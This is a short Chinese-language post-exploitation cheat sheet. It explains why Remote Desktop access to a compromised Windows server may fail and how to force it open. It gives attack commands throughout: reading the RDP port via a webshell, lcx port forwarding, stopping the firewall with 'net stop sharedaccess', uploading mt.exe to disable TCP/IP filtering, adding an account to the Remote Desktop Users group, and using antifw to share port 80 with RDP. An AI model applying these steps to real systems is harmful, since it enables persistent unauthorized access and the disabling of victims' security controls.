原因一:端口改了
原因二:内网
原因三:防火墙
原因四:tcp/ip限制
原因五:不属于远程登陆组
原因六:waf防护(安全狗之类的)
端口改了,可以webshell读取终端端口,要是能执行命令,就 先 tasklist /svc 查找那个终端服务的 pid 之后再 netstat -ano 或直接 netstat -ano一个个试再或者使用nmap 扫,nessus扫更好点
内网,就使用lcx转发
防火墙:net stop sharedaccess
TCP/IP限制
:1.上传mt.exe到目标服务器可执行目录
2.执行命令:mt.exe -filter off
这样就关闭了TCP/IP限制了
不属于远程登陆组:net localgroup "Remote Desktop Users" 123 /add
其次可以尝试端口复用 把3389端口和80端口公用一般内网路由器 不会拦截。
antifw -s 运行程序停止iis将3389改为80
antifw -l 关闭程序。恢复iis